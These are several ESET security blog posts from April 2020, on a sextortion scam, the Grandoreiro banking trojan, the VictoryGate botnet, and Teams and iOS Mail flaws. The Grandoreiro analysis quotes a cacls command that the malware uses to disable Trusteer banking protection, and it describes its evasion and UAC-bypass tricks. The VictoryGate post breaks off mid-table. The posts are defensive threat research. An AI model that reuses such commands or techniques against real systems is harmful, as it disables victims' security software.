Sextortion scammers still shilling with stolen passwords

The email includes the potential victim’s password as evidence of a hack, but there is more than meets the eye

Earlier in April, a new sextortion scam campaign was detected making the rounds in countries on both sides of the Atlantic. The spam emails that were detected by ESET’s research laboratory have been trying to dupe unwitting victims by referring to old passwords that have been part of old data breaches.

The campaign is not altogether new, since it repurposes old scams. The first time that scammers made waves with these tactics was in 2018 with a campaign that also included the victim’s password in the subject line. The email itself claimed that the password was obtained by compromising one of the recipient’s devices using malware.

However frightening this may seem at first glance, these are just social engineering and scare tactics, employed by cybercriminals to generate panic in the recipients of these emails. To put it simply, it is highly unlikely that your computer has either been accessed or compromised, at least not by the method suggested in the email, so there is no need to panic.

In fact, a similar campaign has been spotted recently by ESET researchers: it rehashed the content to reflect the current pandemic situation and includes a threat to infect the victim’s whole family with coronavirus.

The new extortion campaign borrows, or rather builds upon, the previous versions. The scammers start with an alarming message right off the bat to get the victim’s attention, usually by including one of the victim’s old passwords that was probably stolen as part of a previous data breach. Moving on, the fraudsters claim that the victim’s device was infected by some form of malware when visiting a porn website, and that allowed them to obtain both the victim’s password and access to their device. The scammers then purport to have made a video of the victim and the alleged “not safe for work” content.

Once the cybercriminals have scared their potential victims enough, they demand a sum to be paid within 24 hours or the embarrassing video will be released. They usually want the payment to be made in bitcoin.

After analyzing some of the cases stemming from this new sextortion scam campaign, ESET researchers found that it probably started sometime around the 8th or 9th of April. They checked the bitcoin wallet addresses shared by the attackers and found that they weren’t faring very well, to put it mildly. By contrast, during the 2018 campaign the scammers were able to trick victims out of almost half a million dollars.

To reiterate, it is important to note that the password did not come from the potential victim’s compromised machine. All of the breadcrumbs indicate that the campaign leverages credentials taken from large data leaks and older breaches, which, unfortunately, aren’t a rare occurrence. ESET researchers entered some of the victims’ email addresses into to the Have I been pwned? website, and indeed found that their passwords and emails were gathered from services that suffered data breaches such as LinkedIn, Taringa, MyFitnessPal or Canva, among others.

What can I do?

Before you fly into a frenzy, you should take a step back and think about the whole scam. Have you ever visited a porn site? If the answer is no, well, you know the email is fake and you have nothing to worry about. And even if you did (and it’s safe to say you weren’t alone), at best it could be embarrassing to you if the secret were revealed. But to reiterate, the cybercriminals have no evidence whatsoever, video or otherwise, of a potential victim’s intended activities.

Another thing you can do is use Google or whatever search engine you prefer and enter the word scam, in quotes, along with an interesting phrase from the scam email. You can then scroll through the results, of which there may be a few thousand, and see if anything seems vaguely familiar. Quite often you will find examples of similar scams that have been floating about and have already been scrutinized by a number of researchers and experts in the field.

If you’re still not sure what you’re dealing with you can check out a list of other steps compiled by ESET researcher Bruce P. Burrell.

30 Apr 2020 – 11:30AM

ESET Threat Report

A view of the Q1 2020 threat landscape as seen by ESET telemetry and from the perspective of ESET threat detection and research experts

The first quarter of 2020 was, without a doubt, defined by the outbreak of COVID-19 – now a pandemic that has put much of the world under lockdown, disrupting people’s lives in unprecedented ways.

In the face of these developments, many businesses were forced to swiftly adopt work-from-home policies, thereby facing numerous new challenges. The soaring demand for remote access and videoconferencing applications has attracted cybercriminals who quickly adjusted their attack strategies to profit from the shift.

Cybercriminals also haven’t hesitated to exploit public concerns surrounding the pandemic. In March 2020, we saw a surge in scam and malware campaigns using the coronavirus pandemic as a lure, trying to capitalize on people’s fears and hunger for information.

Even under lockdown, our analysts, detection engineers and security specialists continued to keep a close eye on this quarter’s developments. Some threat types – such as cryptominers or Android malware – saw a decrease in detections when compared with the previous quarter; others – such as web threats or stalkerware – were on the rise. Web threats in particular have seen the largest increase in terms of overall numbers of detections, a possible side effect of coronavirus lockdowns.

The researchers in ESET’s Research Labs also did not stop investigating threats – Q1 saw them dissect obfuscation techniques in Stantinko’s new cryptomining module; detail the workings of advanced Brazil-targeting banking trojan Guildma; uncover new campaigns by the infamous Winnti Group and Turla; and uncover Kr00k, a previously unknown vulnerability affecting the encryption of over a billion Wi‑Fi devices.

Before lockdowns became the new normal, experts from ESET Research Labs were sharing their insights at security conferences and events around the world. In February, they unveiled the Kr00k vulnerability research and led a workshop for hunting Linux malware at RSA Conference 2020, and presented two talks at BlueHat IL.

Follow ESET research on Twitter for regular updates on key trends and top threats.

29 Apr 2020 – 02:00PM

Grandoreiro: How engorged can an EXE get?

Another in our occasional series demystifying Latin American banking trojans

In this installment of our series, we introduce Grandoreiro, a Latin American banking trojan targeting Brazil, Mexico, Spain and Peru. As such, it shows unusual effort by its authors to evade detection and emulation, and progress towards a modular architecture.

We have seen Grandoreiro being distributed solely through spam. The authors usually utilize a fake Java or Flash update, but recently, perhaps unsurprisingly, we have observed their spam abusing the fear around COVID-19 as well.

We have named this malware family based on its most notable characteristic – its binaries being bloated to at least a few hundred megabytes. Its development is quite rapid and feature changes and additions are happening very often. In this blogpost, we will focus on the most noteworthy.

Characteristics

Grandoreiro is another Delphi-written Latin American banking trojan we have identified during our research. Grandoreiro has been active at least since 2017 targeting Brazil and Peru, expanding to Mexico and Spain in 2019 (see Figure 1 for a current detection heat map). The fact that it attacks its victims by displaying fake pop-up windows that try to persuade victims to divulge sensitive information should come as no surprise to anyone who has read the previous pieces in the series.
.

Figure 1. Heat map showing ESET’s detections of Grandoreiro.

Grandoreiro, as with any other Latin American banking trojan, employs backdoor functionality, being capable of:

  • manipulating windows
  • updating itself
  • capturing keystrokes
  • simulating mouse and keyboard actions
  • navigating the victim’s browser to a chosen URL
  • logging the victim out or restarting the machine
  • blocking access to chosen websites

Persistence is ensured by creating a .LNK file in the Windows startup directory. Of importance is the fact that Grandoreiro uses the same algorithm for decrypting its internal strings as Casbaneiro. We believe this is due to information sharing between authors of banking trojans in Latin America.

Grandoreiro collects the following information about its victims:

  • computer name
  • username
  • operating system version and bitness
  • whether Diebold Warsaw GAS Tecnologia (an application, popular in Brazil, to protect access to online banking) is installed
  • list of installed security products

In some versions, it also steals credentials stored in the Google Chrome web browser and data stored in Microsoft Outlook.

The authors of Grandoreiro seem to be developing the banking trojan very rapidly, as we observe at least several new versions each month. We also suspect they are developing at least two variants simultaneously.

The authors seem to focus mainly on two areas. The first is hiding the actual C&C address using the Domain Generation Algorithm (DGA) described in next section. The second is making the banking trojan modular. This is an interesting approach as the authors first introduced separate Delphi forms for each bank targeted (which is quite common), but lately even created separate DLLs for each targeted bank. We have not seen this approach in any other Latin American banking trojan we have analyzed.

DGA

Grandoreiro’s DGA uses two strings (prefix and suffix) hardcoded in the binary and the local date as inputs. Those values are processed by a simple algorithm yielding a result in the form https://sites.google[.]com/view/%DATA%, where %DATA% is the generated string (we provide pseudocode in Figure 2). The C&C domain and port are used as the site title, as you can see in Figure 3. Note that based on the DGA, a different website is required for each day. We have observed some variants also using a custom base64 alphabet.

Figure 2. Pseudocode of Grandoreiro’s DGA

Figure 3. Example of a Google site set up by authors of Grandoreiro (translation: “Title of your page”)

Configuration data

In older versions of Grandoreiro, there was a small .ini file distributed alongside the banking trojan that served as a primitive configuration file, containing only a version identifier and an index into a table in the binary that decided which C&C server should be used.

Lately, the configuration mechanism has been changed and is now stored in the Windows Registry at HKCUSoftware under keys named like %USERNAME% and ToolTech-RM. Those names, as well as the names of values they contain, change frequently, but the information contained consists of:

  • an identifier unique for each victim (generated via CoCreateGuid API)
  • executable name and path
  • geolocation of the victim (retrieved via http://ipinfo.io/json)
  • strings necessary for creating and deleting the startup .LNK file
  • notes specific to the victim device (the C&C operator supplies these, if any, via a backdoor command)
  • flags to indicate an action has already been performed, such as
    • stealing Google Chrome stored credentials
    • stealing Outlook data

C&C communication

Grandoreiro implements communication with its C&C server using the RealThinClient SDK. This component uses a protocol that operates over HTTP. After connecting to the server, Grandoreiro performs a handshake and then periodically checks for commands every few seconds. If the trojan misses a check, the server drops the connection.

As we described in our Botconf presentation in December 2019, and as reported recently by SonicWall, there is a very interesting thing about the first “command” received from the C&C server. It is always a list of all currently connected victims, including all the collected information about their machines, as you can see in Figure 4. Note that not all the victims are identified by a string with the same format. Due to Grandoreiro’s rapid development, this string changes quite often, but victims compromised with different variants still connect to the same C&C server.

Figure 4. C&C server responding to initial Grandoreiro connection with a list of currently connected victim.

Distribution

Spam seems to be the sole distribution method for Grandoreiro. The spam emails appear to contain a link pointing to a website offering fake Flash or Java updates (see Figure 5). Notice the red arrow in lower left corner tailored for the Google Chrome web browser, but displayed in other browsers too. We have seen Grandoreiro abusing the fear around COVID-19 as well (see Figure 6), as we already announced on our @ESETresearch Twitter account.

Figure 5. Fake Flash (left) and Java (right) update websites (the left checkbox states that the user agrees with terms and conditions; the text on the right urges the user to install the latest version of Java to avoid issues with security and vulnerabilities)

Figure 6. Fake COVID-19 website. Clicking the video leads to the ZIP archive being downloaded (translation: “Construction of 2 hospitals in 7 days: accelerated video shows construction of hospital in china in 7 days”)

Unlike the majority of Latin American banking trojans, Grandoreiro utilizes quite small distribution chains. For different campaigns, it may choose a different type of downloader, as we illustrate in Figure 7. These downloaders are often stored on well-known public online sharing services such as GitHub, Dropbox, Pastebin, 4shared and 4Sync.

Figure 7. Possible ways that Grandoreiro distribution chains may appear (different colors show different paths the chain may take). The final ZIP archive may be encrypted and in some cases also protected by a password.

The final payload is a ZIP archive that is usually encrypted by the algorithm shown in Figure 8 and, in a significant number of cases, we saw it being password-protected as well.

Figure 8. Pseudocode of the archive decryption algorithm used by Grandoreiro

Distributing the final payload in a ZIP archive is very common among these banking trojans, but in the case of Grandoreiro, it holds extra importance, as you will see in the next section.

Binary padding

The vast majority of Grandoreiro samples utilize a very interesting application of the binary padding technique. This technique is all about making the binaries large and we have seen it being used even by more sophisticated malware. We have also observed some other Latin American banking trojans employing it occasionally, but only in the simplest form of appending a large amount of junk at the end of the binary.

Grandoreiro chooses a different approach – a simple, yet very effective one. The resources section of the PE file is augmented by (usually 3) grande BMP images, making each binary at least 300 MB in size. Notice in Figure 9 that the size of the whole EXE is 425 MB, yet the size of the code is only 4 MB and the size of the .rsrc section 419 MB (98.5% of the total size). After examining the contents of the .rsrc section, we see three images with sizes of 112 MB, 112 MB and 105 MB respectively (taking up 78.5% of the section size). We provide examples of such images in Figure 10.

Figure 9. Details of a Grandoreiro binary. Several Grandoreiro binaries are shown left. The rest shows details of one such binary.

Figure 10. BMP images used by Grandoreiro for binary padding. Their artistic “style” suggests the malware’s authors create them manually.

Because of the structure of those BMP files, compressing the binary into a ZIP archive yields a file of only a few MB, making it much easier to distribute the payload. The BMP files seem to change frequently, most likely to avoid detection. The images shown in Figure 10 come from three different builds of Grandoreiro. The visible similarities lead us to believe the authors update the images manually.

Let us look at the possible outcomes of this technique because, even though it is very simple, it is surprisingly effective. The upload file size limit on VirusTotal was changed to 550 MB during 2019, but used to be 256 MB, so a victim was unable to scan the file using that platform. Working with such a huge file is harder in general, making any automated or manual analyses much slower. At the same time, it is very hard to get rid of these large images while keeping a valid PE file, and by discarding the whole .rsrc section, interesting information such as the fake pop‑up windows is lost.

Self-protection & anti-emulation

For a Latin American banking trojan, Grandoreiro utilizes a surprisingly large number of tricks to evade detection and emulation. In this section, we talk about the most notable ones that appeared in several recent versions we have analyzed.

Diebold Warsaw GAS Tecnologia and Trusteer are known banking access protection software popular in Latin America. Every banking trojan described so far in our series has implemented some sort of check for these programs. Grandoreiro is no exception, by

  • hooking the LdrLoadDll and LoadLibrary(Ex) APIs to prevent loading DLLs belonging to those products
  • checking if any of those modules are already loaded
  • trying to kill their running processes (based on process names)
  • blocking Diebold Warsaw on the firewall level
  • trying to break Trusteer by changing its file system path (see Figure 11)
  • changing ACLs on main Trusteer binary by running this command twice:
    • cacls %PROGRAM_DATA%; TrusteerRapportstoreextsRapportCerberusbaselineRapportGH.dll” /T /E /C /P user:perm
    • with user:perm set to Todos:N and then Everyone:N

Figure 11. Simple BAT script used by Grandoreiro to change Trusteer file path in hopes of making it unable to execute

Besides that, it also monitors hooks on important functions. If such a function starts with 0xE9 (assembly opcode for the jmp instruction), the trojan reloads the function from the corresponding library. Based on window and process names, it also checks for tools like RegMon, RegShot, Wireshark and Process Explorer. It tries to avoid being debugged by calling the IsDebuggerPresent API and setting up a hook via SetWindowsHookEx that returns ERROR_ACCESS_DENIED on the WH_DEBUG event.

Grandoreiro also employs a technique for privilege escalation described in more detail here. The method relies on registering a binary as the default handler for .MSC files and then running such a file. By doing so, the binary will be executed with elevated privileges. This technique no longer works on patched systems due to a fix released in 2017.

Finally, Grandoreiro detects two virtual environments – VMWare via its special I/O port and Virtual PC via the vpcext instruction. Both methods are described in detail here (techniques 1 and 2).

Spam tool

During our investigation, we discovered a tool used for Grandoreiro’s spam campaigns. It is not a tool that automatically registers large number of email accounts, as in the case of Amavaldo and Casbaneiro; it is actually used to create and send the spam messages. It does so by utilizing the EASendMail SDK.

Besides its main purpose, the tool sets up persistence using the Windows registry Run key and disables UAC. The most probable scenario is that the attackers distribute this tool to some victims via Grandoreiro.

A small backdoor component is included and used to receive configuration files. Those files dictate what the emails will look like, what they will point to or where to send them. We provide a complete list of the configuration files and their purpose in Table 1.

Table 1. List of configuration files used by Grandoreiro’s spam tool

Filename Purpose Description
ID.txt None Seems not to be used for the spam emails
html.txt Email body template Template for the email body (including placeholders – those are replaced by values from other config files)
assunto.txt Subject template (assunto = subject) Template for subject (similar to html.txt for email body)
nomes.txt List of fake names Replaces [NOME] placeholder in the templates
link.txt List of malicious URLs The email will link to one of these
lista.txt List of recipients The email will be sent to all of these
login.txt List of usernames Information required to log into the email account that will be used to send the emails
senha.txt List of passwords
smtp.txt SMTP server address

As you can see, the tool is not fully automated, but relies completely on the configuration data. This shows a lower level of sophistication. Its implementation shows similarities with the Grandoreiro banking trojan, which is why we believe it was written by the same authors.

Conclusion

In this installment of our series, we have focused on Grandoreiro, a Latin American banking trojan known to target Brazil, Mexico, Spain and Peru. We have mentioned aspects that are typical for that type of banking trojan, such as being written in Delphi, containing backdoor functionality, targeting Latin America and using fake pop-up windows to attack its victims.

A novel feature of Grandoreiro is its great effort to evade detection. That includes many techniques to detect or even disable banking protection software. It also utilizes a very specific application of the binary padding technique we have not seen before that makes it hard to get rid of the padding while keeping a valid file.

Spam appears to be the exclusive distribution method for Grandoreiro. The emails contain a link that points victims to fake websites set up by the operators. While they usually use simple mechanisms such as fake Flash or Java updates, we have seen them exploiting the current fear of COVID-19 as well.

Grandoreiro shows similarities with other banking trojans previously described in this series, mainly Casbaneiro, with which it shares the string decryption algorithm.

For any inquiries, contact us at [email protected] Indicators of Compromise can also be found in our GitHub repository.

Hashes

Grandoreiro banking trojan

SHA-1 Description ESET Detection name
40FBC932BD45FEB3D2409B3A4C7029DDDE881389 Older version of Grandoreiro (2017) Win32/Spy.Grandoreiro.A
7905DB9BBE2CB29519A5371B175551C6612255EF Grandoreiro Win32/Spy.Grandoreiro.AE
BD88A809B05168D6EFDBA4DC149653B0E1E1E448 Grandoreiro Win32/Spy.Grandoreiro.AJ

Grandoreiro Win32 downloaders

SHA-1 Description ESET detection name
7C2ED8B4AA65BEFCC229A36CE50539E9D6A70EE3 Grandoreiro downloader Win32/TrojanDownloader.Banload.YJR
27A434D2EF4D1D021F283BCB93C6C7E50ACB8EA6 Grandoreiro downloader Win32/TrojanDownloader.Banload.YLZ
28D58402393B6BCA73FF0EAC319226233181EDC9 Grandoreiro downloader Win32/TrojanDownloader.Banload.YJB
42892DF64F00F4C091E1C02F74C2BB8BAD131FC5 Grandoreiro downloader Win32/TrojanDownloader.Banload.YMI

Grandoreiro spam tool

SHA-1 Description ESET detection name
BCED5D138ACEADA1EF11BFD22C2D6359CDA183DB Grandoreiro spam tool Win32/Spy.Grandoreiro.AD

Windows Registry

  • HKCUSoftware%USER_NAME%
  • HKCUSoftwareToolTech-RM

User-Agent

  • h55u4u4u5uii5

Filenames

  • %INSTALL_DIR% *
    • MDL_YEL_01.dll
    • MDL_BLU_BR_02.dll
    • MDL_SIC_BR_03.dll
    • MDL_SANT_BR_04.dll
    • MDL_ITA_BR_05.dll
    • MDL_BRADA_BR_06.dll
    • MDL_SICCB_BR_07.dll
    • MDL_SAFRA_BR_08.dll
    • MDL_ORIGI_BR_09.dll
    • MDL_NORDES_BR_10.dll
    • MDL_BANEST_BR_11.dll
    • MDL_BANEZE_BR_12.dll
    • MDL_AMAZON_BR_13.dll
    • MDL_UNICRE_BR_14.dll
    • MDL_BRB_BR_15.dll
    • MDL_WUPDATE_BR_001.dll

*%INSTALL_DIR% is the path where Grandoreiro is installed

Tactic ID Name Description
Initial Access T1192 Spearphishing Link Grandoreiro distribution chains start with an email link pointing to a fake website.
Execution T1106 Execution through API Grandoreiro is executed either by WinExec or WScript.Shell.Exec API.
Persistence T1060 Registry Run Keys / Startup Folder Grandoreiro ensures persistence by creating a .LNK file in the startup folder.
Privilege Escalation T1088 Bypass User Account Control Grandoreiro bypasses UAC by registering as the default handler for .MSC files.
Defense Evasion T1009 Binary Padding Grandoreiro inserts large BMP files into its .rsrc section to make the binaries much larger.
T1089 Disabling Security Tools Grandoreiro tries to disable Diebold Warsaw and Trusteer banking protection software.
T1140 Deobfuscate/Decode Files or Information Grandoreiro is distributed in a ZIP archive that usually needs to be decrypted.
T1222 File and Directory Permissions Modification Grandoreiro changes the ACL for Trusteer to disable it.
T1036 Masquerading Downloaders that distribute Grandoreiro masquerade as fake update installation files.
T1112 Modify Registry Grandoreiro stores its configuration in the Windows registry.
T1064 Scripting Grandoreiro implements some of its distribution chain stages in VBScript.
T1497 Virtualization/Sandbox Evasion Grandoreiro detects VMWare and Virtual PC.
Credential Access T1503 Credentials from Web Browsers Grandoreiro steals credentials from the Google Chrome browser.
T1081 Credentials in Files Grandoreiro parses Outlook .pst files to extract email addresses.
Discovery T1010 Application Window Discovery Grandoreiro discovers various security tools based on window names.
T1083 File and Directory Discovery Grandoreiro discovers protection software based on file system paths.
T1057 Process Discovery Grandoreiro discovers security tools based on process names.
T1063 Security Software Discovery Grandoreiro detects the presence of banking protection products.
T1082 System Information Discovery Grandoreiro collects information about the victim’s machine, such as %USERNAME%, %COMPUTERNAME%, and product names.
Collection T1056 Input Capture Grandoreiro is capable of capturing keystrokes.
Command and Control T1483 Domain Generation Algorithms Grandoreiro generates its C&C address using a DGA.
T1071 Standard Application Layer Protocol Grandoreiro’s network protocol is implemented by RealThinClient, which is built over HTTP.
Exfiltration T1041 Exfiltration Over Command and Control Channel Grandoreiro sends the data it retrieves to its C&C server.

Further reading

28 Apr 2020 – 11:30AM

Microsoft Teams flaw could let attackers hijack accounts

Microsoft plugs a security hole that could have enabled attackers to weaponize a GIF in order to hijack Teams accounts and steal data

Microsoft has fixed a security flaw in Microsoft Teams that, if left unattended, could have been exploited to take over user accounts. By hijacking a Teams account, the bad actors might eventually traverse through the organization and gather data from the Teams accounts ranging from confidential information, passwords and business plans, among other things, according to researchers from CyberArk.

With companies recently forced to switch to working remotely due to the COVID-19 pandemic, their IT departments were faced with a challenge on how to make the switch to home office safe. Resolving communication was a cornerstone issue, with a large number opting to use one of the premier platforms such as Zoom, Microsoft Teams, or Slack. This has, in turn, put the platforms and it users in the crosshairs of cybercriminals.

CyberArk has now described a possible attack scenario: “We found that by leveraging a sub-domain takeover vulnerability in Microsoft Teams, attackers could have used a malicious GIF to scrape user’s data and ultimately take over an organization’s entire roster of Teams accounts.” The sub-domains that were vulnerable to takeover were aadsync-test.teams.microsoft.com and data-dev.teams.microsoft.com.

“If an attacker can somehow force a user to visit the sub-domains that have been taken over, the victim’s browser will send this cookie to the attacker’s server and the attacker (after receiving the authtoken) can create a skype token. After doing all of this, the attacker can steal the victim’s Teams account data,” reads the article.

RELATED READING: Work from home: Videoconferencing with security in mind

Exploitation of the vulnerability would have involved sending the victims a malicious GIF file. Worryingly, even viewing the GIF would have been enough to be affected, and the attack could spread automatically, in a worm-like fashion. The flaw is said to have been present in both the desktop and web browser versions of Teams.

CyberArk disclosed its findings to Microsoft on March 23rd, with the tech giant acting quickly and correcting the misconfigured Domain Name System (DNS) records on the same day. On April 20th, Microsoft issued a patch for Teams. Apparently, no attacks were spotted in the wild.

Zoom, one of Teams’ key competitors in the communication and collaboration arena, has had its share of privacy and security issues of late. Also, those findings came after half a million Zoom accounts were offered for sale on the dark web, although this was not due to any kind of breach of Zoom’s defenses.

27 Apr 2020 – 06:55PM

Week in security with Tony Anscombe

ESET research into vulnerabilities in smart home hubs – Discovering and disrupting a botnet in Latin America – Digital assistants in the work-from-home era

ESET‘s IoT research team has identified severe vulnerabilities in several smart home hubs that, if exploited, could give attackers full remote access to the central and peripheral devices connected to them. Also this week, ESET researchers disclosed their findings about a botnet that was made up of some 35,000 compromised devices in Latin America – until the researchers helped take it down. How do digital assistants come into play in the current work-from-home era? All this – and more – on WeLiveSecurity.com.

iOS Mail app flaws may have left iPhone users vulnerable for years

A pair of vulnerabilities in the default email app on iOS devices is believed to have been exploited against high-profile targets

Apple’s iOS Mail app, which comes pre-installed on all iOS devices, has been found to contain two severe security vulnerabilities that, if exploited, could enable hackers to steal the victims’ data.

In fact, the attackers have leveraged these flaws for attacks against various targets, including a European journalist, a Japanese executive, and individuals from an undisclosed Fortune 500 company among others, said ZecOps researchers, who uncovered the flaws. Some of the attacks are thought to go back all the way to January 2018.

“Successful exploitation of this vulnerability would allow the attacker to leak, modify, and delete emails. Additional kernel vulnerability would provide full device access – we suspect that these attackers had another vulnerability,” said the company.

The security flaws allow attackers to remotely compromise a device by sending an email that will consume high amounts of the device’s memory – without actually requiring a large email to do so. The vulnerability can be triggered before the whole email is downloaded, although the trigger varies depending on the iOS version the device is running.

On devices running iOS 13, the vulnerability is triggered by an unassisted attack, also known as a ‘zero-click’ attack, which means the Mail app has to be running in the background. On iOS 12, meanwhile, the victim would have to click on the email. These aren’t the only two iOS versions vulnerable; devices running iOS 6 and above are all susceptible to the attack, while older versions haven’t been checked.

Once the vulnerability has been exploited, on iOS 12 the email app would appear to be sluggish and sometimes even crash. On iOS 13, it would manifest as a temporary slowdown of the mail app. In case of a failed attack, the emails send by the hacker would show “This message has no content.”

ESET Security Specialist Jake Moore said that the flaw is unlikely to have been used to target people en masse: “For complete remote access to occur under the radar it will have most likely been used for highly-targeted attacks on high-profile victims. Although this is a very professionally designed secret hack, it would be very unlikely that it was used on mass. Some flaws are kept even further underground amongst cybercriminals and keep certain exclusive vulnerabilities to themselves, so law enforcement and developers are kept in the dark – hence this particular defect has not been spotted for years. This particular flaw will be patched in the next update, so make sure you have your phone set to auto-update to the next version.”

The researchers alerted Apple to the two vulnerabilities and it has developed a fix that is currently available as iOS 13.4.5 beta. As a result, the patch is not readily available yet, since beta versions are mainly aimed at developers. For the time being, you can mitigate the issue by using other email clients.

Last year, Apple had to rush a fix for a FaceTime spying bug.

23 Apr 2020 – 07:54PM

Following ESET’s discovery, a Monero mining botnet is disrupted

ESET researchers discover, and play a key role in the disruption of, a 35,000-strong botnet spreading in Latin America via infected USB drives

ESET researchers recently discovered a previously undocumented botnet that we have named VictoryGate. It has been active since at least May 2019 and, since then, three different variants of the initial module have been identified, in addition to approximately 10 secondary payloads that are downloaded from file hosting websites. The initial module is detected by ESET security products as MSIL/VictoryGate.

This botnet is composed mainly of devices in Latin America, specifically Peru, where over 90% of the compromised devices are located. We’ve been actively sinkholing several command and control (C&C) domains, allowing us to monitor this botnet’s activity. The combination of the sinkhole data and our telemetry data allows us to estimate the botnet’s size to be at least 35,000 devices.

To control its botnet, VictoryGate used only subdomains registered at the dynamic DNS provider No-IP. ESET reported the malicious subdomains to No-IP, who swiftly took them all down, effectively removing control of the bots from the attacker. Also, ESET is collaborating with non-profit Shadowserver Foundation by sharing sinkhole logs in an effort to further remediate this threat.

In Figure 1 you can see the peak number of unique IP addresses connecting to the C&C per day.

Figure 1. Connections to the C&C

The main activity of the botnet was Monero mining. However, given that the botmaster was able to issue commands to the nodes to download and execute new secondary payloads at any given time, this could have changed at some point. This posed a considerable risk, given that we’ve identified compromised network traffic that stems from the public sector and from organizations in the private sector, including financial institutions.

The impacts on the victim’s device are:

Very high resource usage. In all the payloads we analyzed, the malicious code uses all available threads to perform cryptomining, which results in a sustained 90-99% CPU load. This slows down the device, causes overheating and possibly even damage. Files that are contained on USB drives are hidden when connecting to an infected machine. This is part of the propagation mechanism that we’ll discuss shortly.

We’ll cover some of the technical aspects of this threat in this post.

What is VictoryGate?

This is the name we’ve given to the initial module that receives and executes commands from the C&C server. It also implements the propagation mechanism and establishes persistence on victim devices.

Propagation

The only propagation vector we have been able to confirm is through removable devices. The victim receives a USB drive that at some point was connected to an infected machine. It seemingly has all the files with the same names and icons that it contained originally. Because of this, the contents will look almost identical at first glance, as seen in the example in Figure 2. However, the original files have been copied to a hidden directory in the root of the drive and Windows executables have been provided as apparent namesakes.

Figure 2. Comparison of a drive pre- and post-compromise with default Explorer options

In fact, these executables are AutoIt scripts that are compiled on the fly by VictoryGate, using the template in Figure 3. It is worth noting that the build process will also add random metadata to each file so that any two compiled scripts will most likely never have the same hash.

Figure 3. The template used by VictoryGate to compile the propagation scripts

When an unsuspecting user “opens” (i.e. executes) one of these files, the AutoIt script will open both the file that was intended, in addition to the initial module (see Figure 4), both hidden by VictoryGate in a hidden directory as mentioned above.

Figure 4. Propagation script that shows launching a regular file along with executing the malicious module

Once the initial module is executed, it will create a copy of itself in %AppData% (with a nicer name like ctfmon2.exe) and a shortcut in the startup folder pointing to this copy, as a simple mechanism to gain persistence upon system boot.

This module is an approximately 200 MB .NET assembly that contains a huge array with garbage bytes. This is likely done to avoid scanning by some security products that have file size or other resource consumption limits. The array also contains a XORed and gzip-compressed DLL that, at runtime, is deciphered and loaded with a late binding call using the .NET Reflection API.

The DLL itself contains a packed AutoIt-compiled script like the one seen in Figure 3, as well as the methods required to inject it into some legitimate Windows process. We’ve seen vbc.exe (Visual Basic Compiler) or csc.exe (Visual C# Compiler) being targeted.

The injection is done by creating an instance of the vbc.exe process in a suspended state, unmapping its memory sections and then loading the executable from memory. As can be seen in Figure 5, VictoryGate will use several undocumented NTAPI functions such as NtWriteVirtualMemory, rather than using the more common API function WriteProcessMemory, to avoid basic API-hooking detection.

Figure 5. vbc.exe process injection performed by VictoryGate

The injected AutoIt agent is responsible for communication with the C&C server, download and execution of the secondary payloads, and also will constantly scan to detect whether a new USB drive has been connected and, if so, will replace the files that it contains with propagation scripts and hide the original files.

Communication with C&C servers

As mentioned before, the botmaster had the ability to send commands to the nodes to add new secondary payloads. These commands were issued using a custom protocol and uncommon ports as cleartext. The following commands were supported:

Command Description ! The C&C tells the node to download a file from a given URL and then execute it. The node will also use the prefix to notify the C&C that the task has been completed without errors. ~ The node

Buying a secondhand device? Here’s what to keep in mind

If you’re trying to be responsible towards the planet, also be responsible to yourself and take these steps so that the device doesn’t end up costing you more than you’ve saved

According to a report released by the World Economic Forum, the world produced an estimated 50 million tons of electronic waste in 2018. This figure is expected to double in the upcoming years if we don’t change our consumer behavior. In a bid to reduce the stress on our planet, many people have started “going greener”. They have reduced their meat consumption, started to buy less “fast fashion” products and even increased their efforts in recycling… all in a bid to reduce their carbon footprint.

Another way to reduce waste and save your hard-earned money is by buying secondhand electronic devices, notably computers and smartphones – an option that’s especially worth discussing since today is Earth Day.

However, purchasing a secondhand device bears a certain risk since you don’t really know what the device has been through and how it has been used over its months or years of service. But the risks can be mitigated; read on.

Buying the device

When you’re choosing to buy a used device, you have a variety of sources to choose from. The first and probably the best choice is buying a refurbished device from an authorized seller. This basically means that the device has been cleaned and checked by the seller, both from the hardware and software sides. In some cases, you might even get a warranty on the device, which saves you from a headache if it starts failing shortly after purchase.

Alternatively, the other choice is resorting to buying from advertising websites and online marketplaces. In this case, you probably won’t have a chance to inspect the device personally before you order it. If you opt for this scenario, you should definitely use a reputable marketplace that has security measures to deal with scammers. Research the seller, look at their reviews and ask them questions about the device. When you’ve made up your mind, you should use a payment service that has purchase protection just to be safe.

What to do if I bought a secondhand computer?

If you didn’t buy refurbished, then purchasing the computer or laptop is just half of the battle. Now you have to check if everything is in running order. You basically purchased a cat in a bag and you shouldn’t just rush into using the computer. If you turn it on it already has a running operating system, you don’t rush headlong into downloading your favorite programs or go about checking your social media. First, check that there aren’t any remnants of the previous owner’s data on the hard drive. Then try downloading and installing a reputable endpoint security product to scan the computer.

“Why?” you may ask. Well, you have no other reasonable way of knowing whether the seller installed any malicious code on the computer in an effort to defraud you. The computer may have a keylogger installed to gain access to the credentials of all your accounts or perhaps some other form of malware that can steal your data and transfer it to a remote server. Alternatively, any of the previously mentioned things can be present due to the owner failing to take the right precautions.

A green option – compared to replacing the hard drive in the computer with a new one – would involve wiping the drive. Hard drive manufacturers offer utilities that allow you to wipe your drive with varying degrees of security ranging from a single overwrite to multiple passes with random data and even specific security protocols. Once you’ve chosen and done one or the other, you should proceed and do a clean install of the OS of your choice. Adding an endpoint security solution to your computer for added protection will be more than a nice final touch, and you should be ready to go.

What to do if I bought a secondhand smartphone?

As with the case of computers, the same logic applies for smartphones: if you haven’t bought it refurbished with a warranty, you have to get your hands dirty. After the smartphone checks out and has no signs of hardware damage, it’s time to see how the software is doing. If you start it up and it readily goes through the booting process and doesn’t walk you through a setup process, you should immediately be suspicious. The former owner may have been lazy and not gone through the wiping process properly or alternatively or the device may contain some form of malware.

To wipe the phone securely, start by checking whether all of the services have been signed out; once you’ve done that, you should remove all the accounts associated with the phone. The next step is to encrypt the phone’s data. Since you don’t know what kind of data has been stored on the phone, it’s probably safer that way. You’ve finally made it to the factory reset step. The name of the option may vary from manufacturer to manufacturer but in the end, it should always do the same thing: reset the smartphone to factory settings. That means that everything is deleted or wiped, and it should revert to the state it was in when it came out of the box.

Hopefully these tips will help you on your quest to buy a secondhand device and we applaud you for being responsible to our planet. After all, it is the only one we have.

22 Apr 2020 – 11:30AM

Serious flaws found in multiple smart home hubs: Is your device among them?

In worst-case scenarios, some vulnerabilities could even allow attackers to take control over the central units and all peripheral devices connected to them

